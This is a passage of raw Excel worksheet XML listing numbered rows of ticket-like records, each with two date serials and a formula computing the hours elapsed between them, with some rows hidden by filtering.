      </c>
      <c r="H1407" t="str">
        <f>TEXT(F1407-E1407,"[h]")</f>
        <v>100</v>
      </c>
    </row>
    <row r="1408" spans="1:8" hidden="1">
      <c r="A1408" t="s">
        <v>3828</v>
      </c>
      <c r="B1408">
        <v>11842</v>
      </c>
      <c r="C1408" t="s">
        <v>3829</v>
      </c>
      <c r="D1408" t="s">
        <v>7</v>
      </c>
      <c r="E1408" s="1">
        <v>43343.056863425925</v>
      </c>
      <c r="F1408" s="1">
        <v>43347.237974537034</v>
      </c>
      <c r="G1408" t="s">
        <v>1205</v>
      </c>
      <c r="H1408" t="str">
        <f>TEXT(F1408-E1408,"[h]")</f>
        <v>100</v>
      </c>
    </row>
    <row r="1409" spans="1:8">
      <c r="A1409" t="s">
        <v>3830</v>
      </c>
      <c r="B1409">
        <v>11841</v>
      </c>
      <c r="C1409" t="s">
        <v>3831</v>
      </c>
      <c r="D1409" t="s">
        <v>7</v>
      </c>
      <c r="E1409" s="1">
        <v>43342.991030092591</v>
      </c>
      <c r="F1409" s="1">
        <v>43538.765648148146</v>
      </c>
      <c r="G1409" t="s">
        <v>16</v>
      </c>
      <c r="H1409" t="str">
        <f>TEXT(F1409-E1409,"[h]")</f>
        <v>4698</v>
      </c>
    </row>
    <row r="1410" spans="1:8">
      <c r="A1410" t="s">
        <v>3832</v>
      </c>
      <c r="B1410">
        <v>11840</v>
      </c>
      <c r="C1410" t="s">
        <v>3833</v>
      </c>
      <c r="D1410" t="s">
        <v>7</v>
      </c>
      <c r="E1410" s="1">
        <v>43342.820138888892</v>
      </c>
      <c r="F1410" s="1">
        <v>43343.855891203704</v>
      </c>
      <c r="G1410" t="s">
        <v>16</v>
      </c>
      <c r="H1410" t="str">
        <f>TEXT(F1410-E1410,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1411" spans="1:8" hidden="1">
      <c r="A1411" t="s">
        <v>3834</v>
      </c>
      <c r="B1411">
        <v>11839</v>
      </c>
      <c r="C1411" t="s">
        <v>3835</v>
      </c>
      <c r="D1411" t="s">
        <v>7</v>
      </c>
      <c r="E1411" s="1">
        <v>43342.740011574075</v>
      </c>
      <c r="F1411" s="1">
        <v>43470.044363425928</v>
      </c>
      <c r="G1411" t="s">
        <v>118</v>
      </c>
      <c r="H1411" t="str">
        <f>TEXT(F1411-E1411,"[h]")</f>
        <v>3055</v>
      </c>
    </row>
    <row r="1412" spans="1:8" hidden="1">
      <c r="A1412" t="s">
        <v>3836</v>
      </c>
      <c r="B1412">
        <v>11838</v>
      </c>
      <c r="C1412" t="s">
        <v>3837</v>
      </c>
      <c r="D1412" t="s">
        <v>7</v>
      </c>
      <c r="E1412" s="1">
        <v>43342.602002314816</v>
      </c>
      <c r="F1412" s="1">
        <v>43343.304166666669</v>
      </c>
      <c r="G1412" t="s">
        <v>118</v>
      </c>
      <c r="H1412" t="str">
        <f>TEXT(F1412-E1412,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="1413" spans="1:8" hidden="1">
      <c r="A1413" t="s">
        <v>3838</v>
      </c>
      <c r="B1413">
        <v>11837</v>
      </c>
      <c r="C1413" t="s">
        <v>3839</v>
      </c>
      <c r="D1413" t="s">
        <v>7</v>
      </c>
      <c r="E1413" s="1">
        <v>43342.306840277779</v>
      </c>
      <c r="F1413" s="1">
        <v>43349.037870370368</v>
      </c>
      <c r="G1413" t="s">
        <v>66</v>
      </c>
      <c r="H1413" t="str">
        <f>TEXT(F1413-E1413,"[h]")</f>
        <v>161</v>
      </c>
    </row>
    <row r="1414" spans="1:8" hidden="1">
      <c r="A1414" t="s">
        <v>3840</v>
      </c>
      <c r="B1414">
        <v>11836</v>
      </c>
      <c r="C1414" t="s">
        <v>3841</v>
      </c>
      <c r="D1414" t="s">
        <v>7</v>
      </c>
      <c r="E1414" s="1">
        <v>43341.868344907409</v>
      </c>
      <c r="F1414" s="1">
        <v>43362.915335648147</v>
      </c>
      <c r="G1414" t="s">
        <v>1510</v>
      </c>
      <c r="H1414" t="str">
        <f>TEXT(F1414-E1414,"[h]")</f>
        <v>505</v>
      </c>
    </row>
    <row r="1415" spans="1:8" hidden="1">
      <c r="A1415" t="s">
        <v>3842</v>
      </c>
      <c r="B1415">
        <v>11834</v>
      </c>
      <c r="C1415" t="s">
        <v>3843</v>
      </c>
      <c r="D1415" t="s">
        <v>7</v>
      </c>
      <c r="E1415" s="1">
        <v>43341.80709490741</v>
      </c>
      <c r="F1415" s="1">
        <v>43342.710902777777</v>
      </c>
      <c r="G1415" t="s">
        <v>3844</v>
      </c>
      <c r="H1415" t="str">
        <f>TEXT(F1415-E1415,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1416" spans="1:8" hidden="1">
      <c r="A1416" t="s">
        <v>3845</v>
      </c>
      <c r="B1416">
        <v>11833</v>
      </c>
      <c r="C1416" t="s">
        <v>3846</v>
      </c>
      <c r="D1416" t="s">
        <v>7</v>
      </c>
      <c r="E1416" s="1">
        <v>43341.674745370372</v>
      </c>
      <c r="F1416" s="1">
        <v>43342.307511574072</v>
      </c>
      <c r="G1416" t="s">
        <v>66</v>
      </c>
      <c r="H1416" t="str">
        <f>TEXT(F1416-E1416,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1417" spans="1:8" hidden="1">
      <c r="A1417" t="s">
        <v>3847</v>
      </c>
      <c r="B1417">
        <v>11830</v>
      </c>
      <c r="C1417" t="s">
        <v>3848</v>
      </c>
      <c r="D1417" t="s">
        <v>7</v>
      </c>
      <c r="E1417" s="1">
        <v>43340.757430555554</v>
      </c>
      <c r="F1417" s="1">
        <v>43342.263622685183</v>
      </c>
      <c r="G1417" t="s">
        <v>28</v>
      </c>
      <c r="H1417" t="str">
        <f>TEXT(F1417-E1417,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1418" spans="1:8" hidden="1">
      <c r="A1418" t="s">
        <v>1772</v>
      </c>
      <c r="B1418">
        <v>11829</v>
      </c>
      <c r="C1418" t="s">
        <v>3849</v>
      </c>
      <c r="D1418" t="s">
        <v>7</v>
      </c>
      <c r="E1418" s="1">
        <v>43340.695983796293</v>
      </c>
      <c r="F1418" s="1">
        <v>43568.065069444441</v>
      </c>
      <c r="G1418" t="s">
        <v>474</v>
      </c>
      <c r="H1418" t="str">
        <f>TEXT(F1418-E1418,"[h]")</f>
        <v>5456</v>
      </c>
    </row>
    <row r="1419" spans="1:8" hidden="1">
      <c r="A1419" t="s">
        <v>3850</v>
      </c>
      <c r="B1419">
        <v>11828</v>
      </c>
      <c r="C1419" t="s">
        <v>3851</v>
      </c>
      <c r="D1419" t="s">
        <v>7</v>
      </c>
      <c r="E1419" s="1">
        <v>43340.504270833335</v>
      </c>
      <c r="F1419" s="1">
        <v>43342.577118055553</v>
      </c>
      <c r="G1419" t="s">
        <v>3852</v>
      </c>
      <c r="H1419" t="str">
        <f>TEXT(F1419-E1419,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1420" spans="1:8" hidden="1">
      <c r="A1420" t="s">
        <v>3853</v>
      </c>
      <c r="B1420">
        <v>11826</v>
      </c>
      <c r="C1420" t="s">
        <v>3854</v>
      </c>
      <c r="D1420" t="s">
        <v>7</v>
      </c>
      <c r="E1420" s="1">
        <v>43340.482129629629</v>
      </c>
      <c r="F1420" s="1">
        <v>43695.750451388885</v>
      </c>
      <c r="G1420" t="s">
        <v>461</v>
      </c>
      <c r="H1420" t="str">
        <f>TEXT(F1420-E1420,"[h]")</f>
        <v>8526</v>
      </c>
    </row>
    <row r="1421" spans="1:8" hidden="1">
      <c r="A1421" t="s">
        <v>3855</v>
      </c>
      <c r="B1421">
        <v>11823</v>
      </c>
      <c r="C1421" t="s">
        <v>3856</v>
      </c>
      <c r="D1421" t="s">
        <v>7</v>
      </c>
      <c r="E1421" s="1">
        <v>43339.748935185184</v>
      </c>
      <c r="F1421" s="1">
        <v>43339.947141203702</v>
      </c>
      <c r="G1421" t="s">
        <v>55</v>
      </c>
      <c r="H1421" t="str">
        <f>TEXT(F1421-E1421,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1422" spans="1:8" hidden="1">
      <c r="A1422" t="s">
        <v>1772</v>
      </c>
      <c r="B1422">
        <v>11819</v>
      </c>
      <c r="C1422" t="s">
        <v>3857</v>
      </c>
      <c r="D1422" t="s">
        <v>7</v>
      </c>
      <c r="E1422" s="1">
        <v>43338.937430555554</v>
      </c>
      <c r="F1422" s="1">
        <v>43344.718101851853</v>
      </c>
      <c r="G1422" t="s">
        <v>3404</v>
      </c>
      <c r="H1422" t="str">
        <f>TEXT(F1422-E1422,"[h]")</f>
        <v>138</v>
      </c>
    </row>
    <row r="1423" spans="1:8" hidden="1">
      <c r="A1423" t="s">
        <v>3858</v>
      </c>
      <c r="B1423">
        <v>11817</v>
      </c>
      <c r="C1423" t="s">
        <v>3859</v>
      </c>
      <c r="D1423" t="s">
        <v>7</v>
      </c>
      <c r="E1423" s="1">
        <v>43338.865277777775</v>
      </c>
      <c r="F1423" s="1">
        <v>43341.801782407405</v>
      </c>
      <c r="G1423" t="s">
        <v>916</v>
      </c>
      <c r="H1423" t="str">
        <f>TEXT(F1423-E1423,"[h]")</f>
        <v>70</v>
      </c>
    </row>
    <row r="1424" spans="1:8" hidden="1">
      <c r="A1424" t="s">
        <v>3860</v>
      </c>
      <c r="B1424">
        <v>11816</v>
      </c>
      <c r="C1424" t="s">
        <v>3861</v>
      </c>
      <c r="D1424" t="s">
        <v>7</v>
      </c>
      <c r="E1424" s="1">
        <v>43338.004606481481</v>
      </c>
      <c r="F1424" s="1">
        <v>43557.205740740741</v>
      </c>
      <c r="G1424" t="s">
        <v>1205</v>
      </c>
      <c r="H1424" t="str">
        <f>TEXT(F1424-E1424,"[h]")</f>
        <v>5260</v>
      </c>
    </row>
    <row r="1425" spans="1:8">
      <c r="A1425" t="s">
        <v>3862</v>
      </c>
      <c r="B1425">
        <v>11815</v>
      </c>
      <c r="C1425" t="s">
        <v>3863</v>
      </c>
      <c r="D1425" t="s">
        <v>7</v>
      </c>
      <c r="E1425" s="1">
        <v>43336.942187499997</v>
      </c>
      <c r="F1425" s="1">
        <v>43337.800763888888</v>
      </c>
      <c r="G1425" t="s">
        <v>3717</v>
      </c>
      <c r="H1425" t="str">
        <f>TEXT(F1425-E1425,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1426" spans="1:8">
      <c r="A1426" t="s">
        <v>3864</v>
      </c>
      <c r="B1426">
        <v>11813</v>
      </c>
      <c r="C1426" t="s">
        <v>3865</v>
      </c>
      <c r="D1426" t="s">
        <v>7</v>
      </c>
      <c r="E1426" s="1">
        <v>43336.485277777778</v>
      </c>
      <c r="F1426" s="1">
        <v>43338.677407407406</v>
      </c>
      <c r="G1426" t="s">
        <v>31</v>
      </c>
      <c r="H1426" t="str">
        <f>TEXT(F1426-E1426,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="1427" spans="1:8" hidden="1">
      <c r="A1427" t="s">
        <v>3866</v>
      </c>
      <c r="B1427">
        <v>11812</v>
      </c>
      <c r="C1427" t="s">
        <v>3867</v>
      </c>
      <c r="D1427" t="s">
        <v>7</v>
      </c>
      <c r="E1427" s="1">
        <v>43336.18204861111</v>
      </c>
      <c r="F1427" s="1">
        <v>43337.570416666669</v>
      </c>
      <c r="G1427" t="s">
        <v>66</v>
      </c>
      <c r="H1427" t="str">
        <f>TEXT(F1427-E1427,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="1428" spans="1:8" hidden="1">
      <c r="A1428" t="s">
        <v>3868</v>
      </c>
      <c r="B1428">
        <v>11811</v>
      </c>
      <c r="C1428" t="s">
        <v>3869</v>
      </c>
      <c r="D1428" t="s">
        <v>7</v>
      </c>
      <c r="E1428" s="1">
        <v>43335.958124999997</v>
      </c>
      <c r="F1428" s="1">
        <v>43338.864432870374</v>
      </c>
      <c r="G1428" t="s">
        <v>3870</v>
      </c>
      <c r="H1428" t="str">
        <f>TEXT(F1428-E1428,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="1429" spans="1:8">
      <c r="A1429" t="s">
        <v>3871</v>
      </c>
      <c r="B1429">
        <v>11809</v>
      </c>
      <c r="C1429" t="s">
        <v>3872</v>
      </c>
      <c r="D1429" t="s">
        <v>7</v>
      </c>
      <c r="E1429" s="1">
        <v>43335.883472222224</v>
      </c>
      <c r="F1429" s="1">
        <v>43338.677407407406</v>
      </c>
      <c r="G1429" t="s">
        <v>31</v>
      </c>
      <c r="H1429" t="str">
        <f>TEXT(F1429-E1429,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="1430" spans="1:8" hidden="1">
      <c r="A1430" t="s">
        <v>3873</v>
      </c>
      <c r="B1430">
        <v>11807</v>
      </c>
      <c r="C1430" t="s">
        <v>3874</v>
      </c>
      <c r="D1430" t="s">
        <v>7</v>
      </c>
      <c r="E1430" s="1">
        <v>43335.262962962966</v>
      </c>
      <c r="F1430" s="1">
        <v>43581.011354166665</v>
      </c>
      <c r="G1430" t="s">
        <v>2687</v>
      </c>
      <c r="H1430" t="str">
        <f>TEXT(F1430-E1430,"[h]")</f>
        <v>5897</v>
      </c>
    </row>
    <row r="1431" spans="1:8" hidden="1">
      <c r="A1431" t="s">
        <v>3875</v>
      </c>
      <c r="B1431">
        <v>11806</v>
      </c>
      <c r="C1431" t="s">
        <v>3876</v>
      </c>
      <c r="D1431" t="s">
        <v>7</v>
      </c>
      <c r="E1431" s="1">
        <v>43335.212152777778</v>
      </c>
      <c r="F1431" s="1">
        <v>43338.844583333332</v>
      </c>
      <c r="G1431" t="s">
        <v>916</v>
      </c>
      <c r="H1431" t="str">
        <f>TEXT(F1431-E1431,"[h]")</f>
        <v>87</v>
      </c>
    </row>
    <row r="1432" spans="1:8">
      <c r="A1432" t="s">
        <v>3877</v>
      </c>
      <c r="B1432">
        <v>11805</v>
      </c>
      <c r="C1432" t="s">
        <v>3878</v>
      </c>
      <c r="D1432" t="s">
        <v>7</v>
      </c>
      <c r="E1432" s="1">
        <v>43335.023217592592</v>
      </c>
      <c r="F1432" s="1">
        <v>43343.679884259262</v>
      </c>
      <c r="G1432" t="s">
        <v>25</v>
      </c>
      <c r="H1432" t="str">
        <f>TEXT(F1432-E1432,"[h]")</f>
        <v>207</v>
      </c>
    </row>
    <row r="1433" spans="1:8" hidden="1">
      <c r="A1433" t="s">
        <v>3879</v>
      </c>
      <c r="B1433">
        <v>11803</v>
      </c>
      <c r="C1433" t="s">
        <v>3880</v>
      </c>
      <c r="D1433" t="s">
        <v>7</v>
      </c>
      <c r="E1433" s="1">
        <v>43334.769004629627</v>
      </c>
      <c r="F1433" s="1">
        <v>43712.633113425924</v>
      </c>
      <c r="G1433" t="s">
        <v>1587</v>
      </c>
      <c r="H1433" t="str">
        <f>TEXT(F1433-E1433,"[h]")</f>
        <v>9068</v>
      </c>
    </row>
    <row r="1434" spans="1:8" hidden="1">
      <c r="A1434" t="s">
        <v>3881</v>
      </c>
      <c r="B1434">
        <v>11802</v>
      </c>
      <c r="C1434" t="s">
        <v>3882</v>
      </c>
      <c r="D1434" t="s">
        <v>7</v>
      </c>
      <c r="E1434" s="1">
        <v>43334.749803240738</v>
      </c>
      <c r="F1434" s="1">
        <v>43340.678287037037</v>
      </c>
      <c r="G1434" t="s">
        <v>3883</v>
      </c>
      <c r="H1434" t="str">
        <f>TEXT(F1434-E1434,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="1435" spans="1:8" hidden="1">
      <c r="A1435" t="s">
        <v>3884</v>
      </c>
      <c r="B1435">
        <v>11800</v>
      </c>
      <c r="C1435" t="s">
        <v>3885</v>
      </c>
      <c r="D1435" t="s">
        <v>7</v>
      </c>
      <c r="E1435" s="1">
        <v>43334.468657407408</v>
      </c>
      <c r="F1435" s="1">
        <v>43340.806504629632</v>
      </c>
      <c r="G1435" t="s">
        <v>51</v>
      </c>
      <c r="H1435" t="str">
        <f>TEXT(F1435-E1435,"[h]")</f>
        <v>152</v>
      </c>
    </row>
    <row r="1436" spans="1:8">
      <c r="A1436" t="s">
        <v>3886</v>
      </c>
      <c r="B1436">
        <v>11799</v>
      </c>
      <c r="C1436" t="s">
        <v>3887</v>
      </c>
      <c r="D1436" t="s">
        <v>7</v>
      </c>
      <c r="E1436" s="1">
        <v>43334.069594907407</v>
      </c>
      <c r="F1436" s="1">
        <v>43695.659583333334</v>
      </c>
      <c r="G1436" t="s">
        <v>3888</v>
      </c>
      <c r="H1436" t="str">
        <f>TEXT(F1436-E1436,"[h]")</f>
        <v>8678</v>
      </c>
    </row>
    <row r="1437" spans="1:8" hidden="1">
      <c r="A1437" t="s">
        <v>2666</v>
      </c>
      <c r="B1437">
        <v>11797</v>
      </c>
      <c r="C1437" t="s">
        <v>3889</v>
      </c>
      <c r="D1437" t="s">
        <v>7</v>
      </c>
      <c r="E1437" s="1">
        <v>43333.892476851855</v>
      </c>
      <c r="F1437" s="1">
        <v>43334.162604166668</v>
      </c>
      <c r="G1437" t="s">
        <v>1103</v>
      </c>
      <c r="H1437" t="str">
        <f>TEXT(F1437-E1437,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1438" spans="1:8">
      <c r="A1438" t="s">
        <v>3890</v>
      </c>
      <c r="B1438">
        <v>11796</v>
      </c>
      <c r="C1438" t="s">
        <v>3891</v>
      </c>
      <c r="D1438" t="s">
        <v>7</v>
      </c>
      <c r="E1438" s="1">
        <v>43333.708043981482</v>
      </c>
      <c r="F1438" s="1">
        <v>43663.610763888886</v>
      </c>
      <c r="G1438" t="s">
        <v>3892</v>
      </c>
      <c r="H1438" t="str">
        <f>TEXT(F1438-E1438,"[h]")</f>
        <v>7917</v>
      </c>
    </row>
    <row r="1439" spans="1:8" hidden="1">
      <c r="A1439" t="s">
        <v>3893</v>
      </c>
      <c r="B1439">
        <v>11793</v>
      </c>
      <c r="C1439" t="s">
        <v>3894</v>
      </c>
      <c r="D1439" t="s">
        <v>7</v>
      </c>
      <c r="E1439" s="1">
        <v>43333.244293981479</v>
      </c>
      <c r="F1439" s="1">
        <v>43337.570416666669</v>
      </c>
      <c r="G1439" t="s">
        <v>66</v>
      </c>
      <c r="H1439" t="str">
        <f>TEXT(F1439-E1439,"[h]")</f>
        <v>103</v>
      </c>
    </row>
    <row r="1440" spans="1:8" hidden="1">
      <c r="A1440" t="s">
        <v>3895</v>
      </c>
      <c r="B1440">
        <v>11792</v>
      </c>
      <c r="C1440" t="s">
        <v>3896</v>
      </c>
      <c r="D1440" t="s">
        <v>7</v>
      </c>
      <c r="E1440" s="1">
        <v>43333.035254629627</v>
      </c>
      <c r="F1440" s="1">
        <v>43333.044814814813</v>
      </c>
      <c r="G1440" t="s">
        <v>304</v>
      </c>
      <c r="H1440" t="str">
        <f>TEXT(F1440-E1440,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1441" spans="1:8" hidden="1">
      <c r="A1441" t="s">
        <v>3897</v>
      </c>
      <c r="B1441">
        <v>11791</v>
      </c>
      <c r="C1441" t="s">
        <v>3898</v>
      </c>
      <c r="D1441" t="s">
        <v>7</v>
      </c>
      <c r="E1441" s="1">
        <v>43332.799375000002</v>
      </c>
      <c r="F1441" s="1">
        <v>43333.808564814812</v>
      </c>
      <c r="G1441" t="s">
        <v>55</v>
      </c>
      <c r="H1441" t="str">
        <f>TEXT(F1441-E1441,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1442" spans="1:8" hidden="1">
      <c r="A1442" t="s">
        <v>3899</v>
      </c>
      <c r="B1442">
        <v>11790</v>
      </c>
      <c r="C1442" t="s">
        <v>3900</v>
      </c>
      <c r="D1442" t="s">
        <v>7</v>
      </c>
      <c r="E1442" s="1">
        <v>43332.783009259256</v>
      </c>
      <c r="F1442" s="1">
        <v>43343.836342592593</v>
      </c>
      <c r="G1442" t="s">
        <v>55</v>
      </c>
      <c r="H1442" t="str">
        <f>TEXT(F1442-E1442,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="1443" spans="1:8" hidden="1">
      <c r="A1443" t="s">
        <v>3901</v>
      </c>
      <c r="B1443">
        <v>11788</v>
      </c>
      <c r="C1443" t="s">
        <v>3902</v>
      </c>
      <c r="D1443" t="s">
        <v>7</v>
      </c>
      <c r="E1443" s="1">
        <v>43332.29886574074</v>
      </c>
      <c r="F1443" s="1">
        <v>43362.854490740741</v>
      </c>
      <c r="G1443" t="s">
        <v>3903</v>
      </c>
      <c r="H1443" t="str">
        <f>TEXT(F1443-E1443,"[h]")</f>
        <v>733</v>
      </c>
    </row>
    <row r="1444" spans="1:8" hidden="1">
      <c r="A1444" t="s">
        <v>3904</v>
      </c>
      <c r="B1444">
        <v>11787</v>
      </c>
      <c r="C1444" t="s">
        <v>3905</v>
      </c>
      <c r="D1444" t="s">
        <v>7</v>
      </c>
      <c r="E1444" s="1">
        <v>43331.853634259256</v>
      </c>
      <c r="F1444" s="1">
        <v>43333.120393518519</v>
      </c>
      <c r="G1444" t="s">
        <v>1596</v>
      </c>
      <c r="H1444" t="str">
        <f>TEXT(F1444-E1444,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1445" spans="1:8">
      <c r="A1445" t="s">
        <v>3906</v>
      </c>
      <c r="B1445">
        <v>11786</v>
      </c>
      <c r="C1445" t="s">
        <v>3907</v>
      </c>
      <c r="D1445" t="s">
        <v>7</v>
      </c>
      <c r="E1445" s="1">
        <v>43331.601724537039</v>
      </c>
      <c r="F1445" s="1">
        <v>43331.717928240738</v>
      </c>
      <c r="G1445" t="s">
        <v>98</v>
      </c>
      <c r="H1445" t="str">
        <f>TEXT(F1445-E1445,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1446" spans="1:8">
      <c r="A1446" t="s">
        <v>3908</v>
      </c>
      <c r="B1446">
        <v>11785</v>
      </c>
      <c r="C1446" t="s">
        <v>3909</v>
      </c>
      <c r="D1446" t="s">
        <v>7</v>
      </c>
      <c r="E1446" s="1">
        <v>43331.599710648145</v>
      </c>
      <c r="F1446" s="1">
        <v>43331.64675925926</v>
      </c>
      <c r="G1446" t="s">
        <v>713</v>
      </c>
      <c r="H1446" t="str">
        <f>TEXT(F1446-E1446,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1447" spans="1:8" hidden="1">
      <c r="A1447" t="s">
        <v>3910</v>
      </c>
      <c r="B1447">
        <v>11784</v>
      </c>
      <c r="C1447" t="s">
        <v>3911</v>
      </c>
      <c r="D1447" t="s">
        <v>7</v>
      </c>
      <c r="E1447" s="1">
        <v>43331.354664351849</v>
      </c>
      <c r="F1447" s="1">
        <v>43331.606157407405</v>
      </c>
      <c r="G1447" t="s">
        <v>95</v>
      </c>
      <c r="H1447" t="str">
        <f>TEXT(F1447-E1447,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1448" spans="1:8" hidden="1">
      <c r="A1448" t="s">
        <v>3912</v>
      </c>
      <c r="B1448">
        <v>11783</v>
      </c>
      <c r="C1448" t="s">
        <v>3913</v>
      </c>
      <c r="D1448" t="s">
        <v>7</v>
      </c>
      <c r="E1448" s="1">
        <v>43331.349502314813</v>
      </c>
      <c r="F1448" s="1">
        <v>43368.312534722223</v>
      </c>
      <c r="G1448" t="s">
        <v>28</v>
      </c>
      <c r="H1448" t="str">
        <f>TEXT(F1448-E1448,"[h]")</f>
        <v>887</v>
      </c>
    </row>
    <row r="1449" spans="1:8">
      <c r="A1449" t="s">
        <v>3916</v>
      </c>
      <c r="B1449">
        <v>11779</v>
      </c>
      <c r="C1449" t="s">
        <v>3917</v>
      </c>
      <c r="D1449" t="s">
        <v>7</v>
      </c>
      <c r="E1449" s="1">
        <v>43330.580150462964</v>
      </c>
      <c r="F1449" s="1">
        <v>43330.630844907406</v>
      </c>
      <c r="G1449" t="s">
        <v>690</v>
      </c>
      <c r="H1449" t="str">
        <f>TEXT(F1449-E1449,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1450" spans="1:8">
      <c r="A1450" t="s">
        <v>3914</v>
      </c>
      <c r="B1450">
        <v>11778</v>
      </c>
      <c r="C1450" t="s">
        <v>3915</v>
      </c>
      <c r="D1450" t="s">
        <v>7</v>
      </c>
      <c r="E1450" s="1">
        <v>43330.340439814812</v>
      </c>
      <c r="F1450" s="1">
        <v>43330.834976851853</v>
      </c>
      <c r="G1450" t="s">
        <v>22</v>
      </c>
      <c r="H1450" t="str">
        <f>TEXT(F1450-E1450,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1451" spans="1:8">
      <c r="A1451" t="s">
        <v>3920</v>
      </c>
      <c r="B1451">
        <v>11776</v>
      </c>
      <c r="C1451" t="s">
        <v>3921</v>
      </c>
      <c r="D1451" t="s">
        <v>7</v>
      </c>
      <c r="E1451" s="1">
        <v>43329.963356481479</v>
      </c>
      <c r="F1451" s="1">
        <v>43330.423252314817</v>
      </c>
      <c r="G1451" t="s">
        <v>3922</v>
      </c>
      <c r="H1451" t="str">
        <f>TEXT(F1451-E1451,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1452" spans="1:8">
      <c r="A1452" t="s">
        <v>3918</v>
      </c>
      <c r="B1452">
        <v>11774</v>
      </c>
      <c r="C1452" t="s">
        <v>3919</v>
      </c>
      <c r="D1452" t="s">
        <v>7</v>
      </c>
      <c r="E1452" s="1">
        <v>43329.839583333334</v>
      </c>
      <c r="F1452" s="1">
        <v>43330.014664351853</v>
      </c>
      <c r="G1452" t="s">
        <v>22</v>
      </c>
      <c r="H1452" t="str">
        <f>TEXT(F1452-E1452,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1453" spans="1:8" hidden="1">
      <c r="A1453" t="s">
        <v>3925</v>
      </c>
      <c r="B1453">
        <v>11773</v>
      </c>
      <c r="C1453" t="s">
        <v>3926</v>
      </c>
      <c r="D1453" t="s">
        <v>7</v>
      </c>
      <c r="E1453" s="1">
        <v>43329.778449074074</v>
      </c>
      <c r="F1453" s="1">
        <v>43329.954050925924</v>
      </c>
      <c r="G1453" t="s">
        <v>90</v>
      </c>
      <c r="H1453" t="str">
        <f>TEXT(F1453-E1453,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1454" spans="1:8" hidden="1">
      <c r="A1454" t="s">
        <v>3927</v>
      </c>
      <c r="B1454">
        <v>11772</v>
      </c>
      <c r="C1454" t="s">
        <v>3928</v>
      </c>
      <c r="D1454" t="s">
        <v>7</v>
      </c>
      <c r="E1454" s="1">
        <v>43329.754328703704</v>
      </c>
      <c r="F1454" s="1">
        <v>43330.014664351853</v>
      </c>
      <c r="G1454" t="s">
        <v>109</v>
      </c>
      <c r="H1454" t="str">
        <f>TEXT(F1454-E1454,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1455" spans="1:8">
      <c r="A1455" t="s">
        <v>3929</v>
      </c>
      <c r="B1455">
        <v>11771</v>
      </c>
      <c r="C1455" t="s">
        <v>3930</v>
      </c>
      <c r="D1455" t="s">
        <v>7</v>
      </c>
      <c r="E1455" s="1">
        <v>43329.751631944448</v>
      </c>
      <c r="F1455" s="1">
        <v>43385.352453703701</v>
      </c>
      <c r="G1455" t="s">
        <v>189</v>
      </c>
      <c r="H1455" t="str">
        <f>TEXT(F1455-E1455,"[h]")</f>
        <v>1334</v>
      </c>
    </row>
    <row r="1456" spans="1:8" hidden="1">
      <c r="A1456" t="s">
        <v>3931</v>
      </c>
      <c r="B1456">
        <v>11769</v>
      </c>
      <c r="C1456" t="s">
        <v>3932</v>
      </c>
      <c r="D1456" t="s">
        <v>7</v>
      </c>
      <c r="E1456" s="1">
        <v>43329.611909722225</v>
      </c>
      <c r="F1456" s="1">
        <v>43628.09233796296</v>
      </c>
      <c r="G1456" t="s">
        <v>2687</v>
      </c>
      <c r="H1456" t="str">
        <f>TEXT(F1456-E1456,"[h]")</f>
        <v>7163</v>
      </c>
    </row>
    <row r="1457" spans="1:8" hidden="1">
      <c r="A1457" t="s">
        <v>3933</v>
      </c>
      <c r="B1457">
        <v>11765</v>
      </c>
      <c r="C1457" t="s">
        <v>3934</v>
      </c>
      <c r="D1457" t="s">
        <v>7</v>
      </c>
      <c r="E1457" s="1">
        <v>43329.223449074074</v>
      </c>
      <c r="F1457" s="1">
        <v>43330.769166666665</v>
      </c>
      <c r="G1457" t="s">
        <v>368</v>
      </c>
      <c r="H1457" t="str">
        <f>TEXT(F1457-E1457,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="1458" spans="1:8">
      <c r="A1458" t="s">
        <v>3935</v>
      </c>
      <c r="B1458">
        <v>11763</v>
      </c>
      <c r="C1458" t="s">
        <v>3936</v>
      </c>
      <c r="D1458" t="s">
        <v>7</v>
      </c>
      <c r="E1458" s="1">
        <v>43329.125405092593</v>
      </c>
      <c r="F1458" s="1">
        <v>43329.195914351854</v>
      </c>
      <c r="G1458" t="s">
        <v>98</v>
      </c>
      <c r="H1458" t="str">
        <f>TEXT(F1458-E1458,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1459" spans="1:8" hidden="1">
      <c r="A1459" t="s">
        <v>3937</v>
      </c>
      <c r="B1459">
        <v>11762</v>
      </c>
      <c r="C1459" t="s">
        <v>3938</v>
      </c>
      <c r="D1459" t="s">
        <v>7</v>
      </c>
      <c r="E1459" s="1">
        <v>43329.06658564815</v>
      </c>
      <c r="F1459" s="1">
        <v>43515.356539351851</v>
      </c>
      <c r="G1459" t="s">
        <v>3939</v>
      </c>
      <c r="H1459" t="str">
        <f>TEXT(F1459-E1459,"[h]")</f>
        <v>4470</v>
      </c>
    </row>
    <row r="1460" spans="1:8">
